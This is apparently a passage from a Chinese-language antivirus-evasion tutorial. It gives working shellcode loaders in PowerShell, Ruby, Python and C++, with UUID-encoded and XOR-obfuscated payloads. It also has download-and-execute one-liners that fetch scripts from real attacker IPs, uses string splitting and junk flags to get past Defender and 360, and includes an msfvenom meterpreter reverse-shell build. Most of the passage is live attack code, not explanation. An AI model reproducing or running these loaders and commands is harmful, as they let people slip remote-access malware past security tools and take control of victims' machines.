ZSwgJHZhcl9wYXJhbWV0ZXJzKS5TZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKCglyZXR1cm4gJHZhcl90eXBlX2J1aWxkZXIuQ3JlYXRlVHlwZSgpCn0KCltCeXRlW11dJHZhcl9jb2RlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMzh1cUl5TWpRNnJHRXZGSHFIRVRxSEV2cUhFM3FGRUxMSlJwQlJMY0V1T1BIMEpmSVE4RDR1d3VJdVRCMDNGMHFIRXpxR0VmSXZPb1kxdW00MWRwSXZOenFHczdxSHNESXZEQUgycW9GNmdpOVJMY0V1T1A0dXd1SXVRYncxYlhJRjdiR0Y0SFZzRjdxSHNISXZCRnFDOW9xSHMvSXZDb0o2Z2k4NnBuQndkNGVFSjZlWExjdzN0OGVhZ3h5S1YrUzAxR1Z5TkxWRXBOU25kTGIxUUZKTnoyRXR4MGRIUjBkRXNaZFZxRTNQYktweU1qSTNnUzZuSnlTU0J5Y2t0RE1pTWpjSE5MZEtxODVkejJ5Rk40RXZGeFN5TWhZNmR4Y1hGd2NYTkx5SFlOR056MnF1V2c0SE1TM0hSMFNkeHdkVXNPSlR0WTNQYW00eXluNENJakl4TGNwdFZYSjZyYXlDcExpZWJCZnR6MnF1SkxaZ0o5RXR6MkV0eDBTU1J5ZFhOTGxIVERLTnoybkNNTUl5TWE1RmVVRXR6S3NpSWpJOHJxSWlNank2amMzTndNZEVkcGRDUHBpT3BMK0syTmJQYmk3dEtzYUpQRXhPMXBOQ1hyTjI1Tlo1SWdGUFdxU1lNdmtwZ0lYdTNENEI4S2tXaTc1WlhtQ2gzVFJEZjUrY1pORTFQWEFOaTVHNUhLdW5TYTZFVXNJM1pRUmxFT1lrUkdUVmNaQTI1TVdVcFBUMElNRmcwVEF3dEFURTVUUWxkS1FVOUdHQU51Y0dwbUF4b05FeGdEZEVwTlIweFVVQU50ZHdNVkRSSVlBM1JLVFJVWEdBTmJGUmNZQTNkUlNrZEdUVmNNRmcwVEdBTnVZbUoyR0FOdGN4TWJDaTRwSTZhV3gzU1R3Q1YxVFBVbTcyWVpDa2p0WlB3VnJHeUtvcnNWRmIybzlkRTM3Y3BXaW1WbElSNU94SXBRWGdOVGZsLzVNVHVaQkZYRnJVTlpZWWdreld1T3NMb2t2Q0JjZUJuWE13MStpVWRublFqRnpLRGhJZklyMDN4bGlGYm1Kaksrb1h6MTJGZEt3WmVubUtWeHZKV0lQQXJsLzU3S1RDVjdSQnJ2RENVUlIyM0NQK3RnNGo2eXdCRjJ1bFNmcWkwT1Z0THVIbnkwQnNXcTJHbFkyNUQ5UVdQbW94WkdZUElhSTYyeG5zVW5IVjVaTmhPb1BuS055cVA5Y2VuZVU5YlpDQVp2dzJKYzNTTkwwNWFCZGR6MlNXTkxJek1qSTBzakkyTWpkRXQ3aDNERzNQYXdtaU1qSXlNaStuSndxc1IwU3lNREl5TndkVXN4dGFyQjNQYW00MWZscUNRaTRLYmpWc1o3NE11SzN0emNGeEFORWhBYkRSRVVEUklSSTJxMUlmRT0nKQoKZm9yICgkeCA9IDA7ICR4IC1sdCAkdmFyX2NvZGUuQ291bnQ7ICR4KyspIHsKCSR2YXJfY29kZVskeF0gPSAkdmFyX2NvZGVbJHhdIC1ieG9yIDM1Cn0KCiR2YXJfdmEgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpHZXREZWxlZ2F0ZUZvckZ1bmN0aW9uUG9pbnRlcigoZnVuY19nZXRfcHJvY19hZGRyZXNzIGtlcm5lbDMyLmRsbCBWaXJ0dWFsQWxsb2MpLCAoZnVuY19nZXRfZGVsZWdhdGVfdHlwZSBAKFtJbnRQdHJdLCBbVUludDMyXSwgW1VJbnQzMl0sIFtVSW50MzJdKSAoW0ludFB0cl0pKSkKJHZhcl9idWZmZXIgPSAkdmFyX3ZhLkludm9rZShbSW50UHRyXTo6WmVybywgJHZhcl9jb2RlLkxlbmd0aCwgMHgzMDAwLCAweDQwKQpbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCR2YXJfY29kZSwgMCwgJHZhcl9idWZmZXIsICR2YXJfY29kZS5sZW5ndGgpCgokdmFyX3J1bm1lID0gW1N5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcy5NYXJzaGFsXTo6R2V0RGVsZWdhdGVGb3JGdW5jdGlvblBvaW50ZXIoJHZhcl9idWZmZXIsIChmdW5jX2dldF9kZWxlZ2F0ZV90eXBlIEAoW0ludFB0cl0pIChbVm9pZF0pKSkKJHZhcl9ydW5tZS5JbnZva2UoW0ludFB0cl06Olplcm8p '@ $z = [System.Text.Encoding ]::UTF8.GetString([System.Convert ]::FromBase64String($DoIt ))If ([Int Ptr ]::size -eq 8 ) { start-job { param ($a ) IEX $a } -RunAs32 -Argument $z | wait-job | Receive-Job } else { IEX $z }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $bb =[System.Text.Encoding ]::ASCII.GetString([System.Convert ]::FromBase64String($x ))powershell -ExecutionPolicy bypass -File hr.ps1 填充垃圾数据 直接在base64编码上添加,然后解码前进行还原(为了让杀毒判断失效) 直接在原型代码上添加,然后解码还原 项目混淆:Invoke-Obfuscation https://github.com/danielbohannon/Invoke-Obfuscation 加载模块:Import-Module ./Invoke-Obfuscation .psd1 运行程序:Invoke-Obfuscation 处理文件:set scriptpath C:\Users\86135 \Desktop\1 .ps1 处理代码:set scriptblock 'xxxx' 进入编码:encoding 选择编码:1 -8 输出文件:out C:\Users\86135 \Desktop\11 .ps1
分离免杀 通过将shellcode放在web端,利用加载器去下载执行
1 2 3 4 5 6 7 8 $d = ((New-Object System.Net.Webclient).DownloadString('http://47.94.236.117/1.txt' ))解码: $x =[System.Text.Encoding ]::UTF8.GetString([System.Convert ]::FromBase64String($d ))http://47.94 .236.117 /1 .txt = $d base64数据 $d = ((New-Object System.Net.Webclient).DownloadString('http://47.94.236.117/1.txt' ))$x =[System.Text.Encoding ]::UTF8.GetString([System.Convert ]::FromBase64String($d ))
PowerShell-文件模式-特征修改过DeFender(过不了火绒) https://www.cnblogs.com/zzjdbk/p/14380138.html
Fuzz DF查杀特征
1、Shellcode换格式
2、变量名&函数名全修改
将shellcode转换成字节形式,将变量名函数名换成自定义的
1 2 3 4 5 $string = '' $s = [Byte []]$var_code = [System.Convert ]::FromBase64String('【cs生成的shellcode】' )$s |foreach { $string = $string + $_ .ToString()+',' }$string > D:\2 .txt
直接命令执行上线如果被提示,可以通过以下方法
3、垃圾数据干扰:
powershell -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString(‘ht’+’tp://43.138.27.12:8880/2.ps1’)
4.通过copy powershell.exe程序 到当前文件:
1 2 3 4 5 替换文件名: powershell "$a ='IEX((New-Object Net.WebClient).DownloadString(''ht';$b ='tp://47.94.236.117/x.ps1''));';IEX ($a +$b )" copy C:\Windows\System32\WindowsPowerShell\v1.0 \powershell.exe bypass.txtbypass.txt "$a ='IEX((New-Object Net.WebClient).DownloadString(''ht';$b ='tp://47.94.236.117/x.ps1''));';IEX ($a +$b )"
5.也可以将脚本命令转换为exe程序进行绕过
6.对于IEX这种方便快捷的方式直接运行会被360拦截。可尝试从语法上简单变化。主要是对DownloadString、http做一些处理。
http://wiki.tidesec.com/docs/bypassav
1 2 powershell -NoExit "$c1 ='IEX(New-Object Net.WebClient).Downlo';$c2 ='123(''http://10.211.55.2/shell.ps1'')'.Replace('123','adString');IEX ($c1 +$c2 )"
汇编代码免杀绕过 参考:
https://forum.butian.net/share/1536
java免杀(静态) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 1、JAR包源码特征修改免杀 msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar -Jar反编译导出-jdgui -修改上线配置-config -修改启动主类-MANIFEST.MF -修改执行代码-Main.java -打包class-javac Main.java -编译jar-jar cvfm xiaodi.jar META-INF/MANIFEST.MF . 2、JAR包打包EXE执行免杀 安装:exe4j Inno进行打包 exe4j-下载链接:https://exe4j.apponic.com/ inno-下载链接:https://jrsoftware.org/isdl.php 操作说明:https://www.jb51.net/article/236000.htm
Ruby免杀: 1 2 3 4 5 6 7 8 9 10 11 12 require 'fiddle' require 'fiddle/import' require 'fiddle/types' shellcode = "" include Fiddle kernel32 = Fiddle .dlopen('kernel32' ) ptr = Function .new(kernel32['VirtualAlloc' ], [4 ,4 ,4 ,4 ], 4 ).call(0 , shellcode.size, 0x3000 , 0x40 ) Function .new(kernel32['VirtualProtect' ], [4 ,4 ,4 ,4 ], 4 ).call(ptr, shellcode.size, 0 , 0 )buf = Fiddle : :Pointer [shellcode] Function .new(kernel32['RtlMoveMemory' ], [4 , 4 , 4 ],4 ).call(ptr, buf, shellcode.size)thread = Function .new(kernel32['CreateThread' ],[4 ,4 ,4 ,4 ,4 ,4 ], 4 ).call(0 , 0 , ptr, 0 , 0 , 0 ) Function .new(kernel32['WaitForSingleObject' ], [4 ,4 ], 4 ).call(thread, ‐1 )
无文件落地(加载器分离) https://www.freebuf.com/articles/compliance/290379.html
Python-File-将shellcode从文本中提取 1 2 with open ('s.txt' ,'rb' ) as f: s=f.read()
Python-Argv-将shellcode与加载器分离 1 2 3 4 5 核心代码: z=sys.argv[1 ] zx=base64.b64decode(z) exec (zx)
Python-Http-将shellcode用远程协议加载 1 2 all =requests.get('http://www.xxxx.com/all.txt' ).text
Python-Socket-将shellcode通过管道传输 1 2 3 4 5 6 7 8 9 10 11 12 参考:https://www.cnblogs.com/Keep-Ambition/p/7459213. html def zx (data ): 执行code server = socket.socket() server.bind(("0.0.0.0" ,9999 )) server.listen(5 ) while True : conn,addr = server.accept() while True : data = conn.recv(1024 ) zx(data)
Python-Images-将shellcode隐写进图片内 1 2 3 4 参考:https://mp.weixin.qq.com/s/c8U2M_iJ8pWaI50sH8u9Hw 加密:RGBAencodeDataInImage(im, arguments['<text>' ]).save(arguments['<encodedImage>' ]) 解密:im = Image.open (arguments['<encodedImage>' ])
https://mp.weixin.qq.com/s/QZ5YlRZN47zne7vCzvUpJw
UUID转换shellcode写入内存免杀 https://xz.aliyun.com/t/12253
https://www.crisprx.top/archives/458
https://cloud.tencent.com/developer/article/1787219
c++ uuid加载器 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 #include <Windows.h> #include <Rpc.h> #include <iostream> #pragma comment(lib,"Rpcrt4.lib" ) using namespace std;const char * uuids[] = { "0089e8fc-0000-8960-e531-d2648b52308b" ,"528b0c52-8b14-2872-0fb7-4a2631ff31c0" ,"7c613cac-2c02-c120-cf0d-01c7e2f05257" ,"8b10528b-3c42-d001-8b40-7885c0744a01" ,"488b50d0-8b18-2058-01d3-e33c498b348b" ,"ff31d601-c031-c1ac-cf0d-01c738e075f4" ,"3bf87d03-247d-e275-588b-582401d3668b" ,"588b4b0c-011c-8bd3-048b-01d089442424" ,"59615b5b-515a-e0ff-585f-5a8b12eb865d" ,"74656e68-6800-6977-6e69-54684c772607" ,"ff31d5ff-5757-5757-5768-3a5679a7ffd5" ,"000084e9-5b00-c931-5151-6a0351516850" ,"53000000-6850-8957-9fc6-ffd5eb705b31" ,"006852d2-4002-5284-5252-53525068eb55" ,"d5ff3b2e-c689-c383-5031-ff57576aff53" ,"062d6856-7b18-d5ff-85c0-0f84c3010000" ,"f685ff31-0474-f989-eb09-68aac5e25dff" ,"68c189d5-2145-315e-ffd5-31ff576a0751" ,"b7685056-e057-ff0b-d5bf-002f000039c7" ,"ff31b774-91e9-0001-00e9-c9010000e88b" ,"2fffffff-6b31-566a-00fe-dc7a2d31c9e7" ,"42b51e28-625f-f5a3-6442-792da2d8f774" ,"c764c1ca-fec2-b232-360a-a0904efad447" ,"d98ba404-65e6-8fa1-bee4-b69563f0b446" ,"60f88520-b15e-a0f8-59ef-9eb2c6e6f95d" ,"5500078e-6573-2d72-4167-656e743a204d" ,"6c697a6f-616c-352f-2e30-2028636f6d70" ,"62697461-656c-203b-4d53-49452031302e" ,"57203b30-6e69-6f64-7773-204e5420362e" ,"57203b32-574f-3436-3b20-54726964656e" ,"2e362f74-3b30-5420-6f75-63683b204d41" ,"534a5053-0d29-000a-91a8-10b7da807fab" ,"2f1623c7-614b-ebbd-a514-6f904bdf5a58" ,"1f5557e0-6adb-7456-c2a1-9c9f32da910d" ,"952d1001-8eef-7249-3a2b-9e598e85a6ad" ,"98c69cb6-7d10-1f09-60a3-4aeabe4af549" ,"d618c78a-2260-1751-b8d6-61d38a81373e" ,"3d1c3d6a-f3c5-57a0-0204-4457c1142371" ,"6c8708c2-6b94-c189-d92b-cc6b62253fbb" ,"f102569f-4d54-914d-4e89-5bda5ff092a5" ,"cfafb2ac-e2bb-b0af-ca5b-08834c927ab5" ,"07d2b997-8fc9-80b7-fc26-3da3d19e2942" ,"780bcd05-11c2-4f86-6657-dae24b98cc46" ,"febde54d-2cc7-d3c4-e5c0-f943cad41d5a" ,"6800da73-b5f0-56a2-ffd5-6a4068001000" ,"00006800-0040-6857-58a4-53e5ffd593b9" ,"00000000-d901-5351-89e7-576800200000" ,"12685653-8996-ffe2-d585-c074c68b0701" ,"75c085c3-58e5-e8c3-a9fd-ffff31302e31" ,"32342e39-312e-3434-0012-345678000000" }; int main () HANDLE hc = HeapCreate (HEAP_CREATE_ENABLE_EXECUTE, 0 , 0 ); void * ha = HeapAlloc (hc, 0 , 0x100000 ); if (ha == NULL ) { cout << "内存申请失败!" << endl; return 0 ; } DWORD_PTR hptr = (DWORD_PTR)ha; int elems = sizeof (uuids) / sizeof (uuids[0 ]); for (int i = 0 ; i < elems; i++) { RPC_STATUS status = UuidFromStringA ((RPC_CSTR)uuids[i], (UUID*)hptr); if (status != RPC_S_OK) { cout << "UuidFromeStringA()!=S_OK" << endl; CloseHandle (ha); return -1 ; } hptr += 16 ; } EnumSystemLocalesA ((LOCALE_ENUMPROCA)ha, 0 ); CloseHandle (ha); return 0 ; }
利用python2脚本将shellcode转换成uuid 1 2 3 4 5 6 7 8 9 10 11 import binasciiimport uuidbuf='\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x60\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x74\x43\x43\x63\x00\x6f\xc7\xb5\xfb\x90\x23\x05\x5e\xfe\xbf\x26\xa1\x46\x4b\x36\x28\xe6\xd1\xab\x1f\xc4\x12\x9a\x19\x5f\x81\x42\x52\xef\x4b\xc3\x7c\xcf\x23\xea\x51\x00\x2e\xb8\xfa\xd5\xc5\xe6\xde\x0f\xe3\x56\x5f\xc9\x36\x70\x95\x75\x17\x6f\x16\x05\x5f\x43\xd2\xcb\x8d\x72\x59\xb3\xe1\x8f\x1a\x3d\x94\xc1\x6a\xa8\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x38\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x35\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x34\x2e\x30\x29\x0d\x0a\x00\x84\xfd\x1c\x74\xe3\xda\x9f\x6c\x3b\xf3\x5d\x2e\xfe\x41\x0e\x49\x8c\x4e\x85\x5a\x10\x24\xf9\x19\xb5\xbe\x48\xf3\xfe\xc2\x20\xa8\x49\xdd\xd7\xd8\x35\xd5\x1a\x02\x8d\xaa\xbd\xfa\x56\x1e\x89\x8e\x99\x12\xfc\x51\x96\x2d\xc7\x90\x1f\x3c\xc8\x14\xdb\x9a\x62\xf2\x40\x4f\x7a\x63\x86\x08\x2a\xec\x86\x82\x55\xef\xb8\x18\x88\x69\xe6\x9f\x6d\xce\x1e\x28\x2e\x16\xb2\xa6\x13\x75\xd2\xa7\x4c\xae\x7a\x58\xea\x5c\x74\xb1\xce\x15\x92\xb4\xd9\x75\x6f\x33\xc1\xe6\x71\x08\x60\x27\x39\x6d\x6c\xfe\xf6\x3a\xda\x6d\x66\x72\xc6\x01\x9a\xb5\x40\x4d\xa0\xce\xe8\xa5\x6f\x01\x54\x9c\xe3\x1f\x36\x78\xd8\x71\xc6\x7f\x36\x8f\x06\xf8\xed\xc2\x53\xcc\x78\xe6\x34\xb8\x9c\xe9\xeb\x47\xc7\xaf\x08\xbb\x46\xdc\x00\xdd\x20\x59\xa7\xab\xbc\x68\x1e\xbe\x43\xd5\x37\x39\x09\x25\x27\xb3\xaa\x06\x25\x5d\x51\x12\xf5\xc7\xfc\xb0\xa2\xec\x0d\xa3\x63\xcd\x9f\xc4\x16\x01\x5d\x8d\x5e\x3f\x60\x86\xf1\x15\x7a\x11\x39\xf3\x1b\xae\xa0\x13\xb7\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x34\x33\x2e\x31\x33\x38\x2e\x32\x37\x2e\x31\x32\x00\x49\x96\x02\xd2' uuid_list = [] hex = binascii.hexlify(buf).decode()hex += '0' * (32 - (len (hex ) % 32 ))for i in range (0 ,len (hex ),32 ): print ("\"{}\"," .format (uuid.UUID(bytes_le=binascii.unhexlify(hex [i:i+32 ]))))
python2 uuid加载器 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 import uuidimport ctypesimport binasciiimport uuidshellcode="\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x60\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x31\x73\x68\x51\x00\x27\x6b\x08\x03\x3f\x21\xf1\xec\xd6\xc0\x3b\xae\xe3\xab\x55\x82\xf4\x40\xbc\x5b\x9f\xfa\x45\xbd\x37\x51\x3b\xe0\x0d\xa4\x3b\xb2\xd1\xf9\x74\xda\x3a\xd8\x44\xb1\x60\x84\xc5\x83\x10\x70\x5e\x54\x63\xc7\xf8\xf8\x74\x9b\x2b\x6a\x35\x08\xd5\x11\xa9\x32\x98\xec\xd8\x01\xf0\xc4\xae\x4b\x4b\x6c\xba\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x3b\x20\x4d\x41\x53\x50\x29\x0d\x0a\x00\x36\x33\x5a\x21\x1c\xe3\x65\x2d\x0e\x19\xa1\xd3\x4c\xf9\x56\xc3\x4e\x54\x7e\x1c\x21\x38\x30\xf3\xf7\x7f\x4a\x21\x52\xb8\x55\x9f\xd0\x0f\x25\x99\x79\x4a\x2b\xcc\xd7\x09\x95\x74\x3b\xee\x1c\xfa\xad\xbd\xec\x84\x00\xdb\xd8\x58\x89\xb8\xad\xd3\x86\x5b\xd3\x09\xc2\xcd\xb6\xfd\x9e\x9f\xb2\x26\xc8\xaa\xfc\x0e\xc9\xf8\xa2\xfd\x5c\x99\x91\xb7\x08\x11\xd8\x91\xde\xfe\x43\x95\x1c\x96\x29\x08\x55\x39\x21\x7d\x8c\xd5\xac\x46\x6e\x78\x65\x16\xb9\xf1\x53\xc6\x25\x76\x78\xd7\xfd\xdd\xb0\x7f\x40\xea\x7f\x68\xba\x6e\x5d\x99\x55\x5f\x11\xd9\x05\x90\x92\x2c\x9e\xb3\x75\x5e\x73\x72\x81\x4d\xe0\x00\xa6\x38\x0b\xed\xe5\x4e\xcb\x8d\xd1\x44\x12\xb3\xf8\xd0\x3a\xcc\xd6\x06\xf1\x36\x4f\x8e\x66\x39\x66\x42\xe3\xc7\x74\xa5\xbd\xac\x0d\xe6\xe5\xd3\x53\x0c\x8e\x90\xca\xd3\x01\x0d\x88\x7c\x91\x63\xdb\xe2\xd9\xb3\x4d\x9f\x57\x3b\x64\x31\x8a\x66\xea\x78\xeb\x07\x09\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x34\x33\x2e\x31\x33\x38\x2e\x32\x37\x2e\x31\x32\x00\x49\x96\x02\xd2" list = []for i in range (50 ): bytes_a = shellcode[i * 16 : 16 + i * 16 ] b = uuid.UUID(bytes_le=bytes_a) list .append(str (b)) print (list )ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64 ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0 ), ctypes.c_int(len (uuid_list)*16 ), ctypes.c_int(0x3000 ), ctypes.c_int(0x40 )) ptr1 = ptr for j in uuid_list: ctypes.windll.Rpcrt4.UuidFromStringA(j, ptr1) ptr1 += 16 handle = ctypes.windll.kernel32.CreateThread(0 , 0 , ptr, 0 , 0 , 0 ) ctypes.windll.kernel32.WaitForSingleObject(handle, -1 )
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 import uuidimport ctypesshellcode=b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\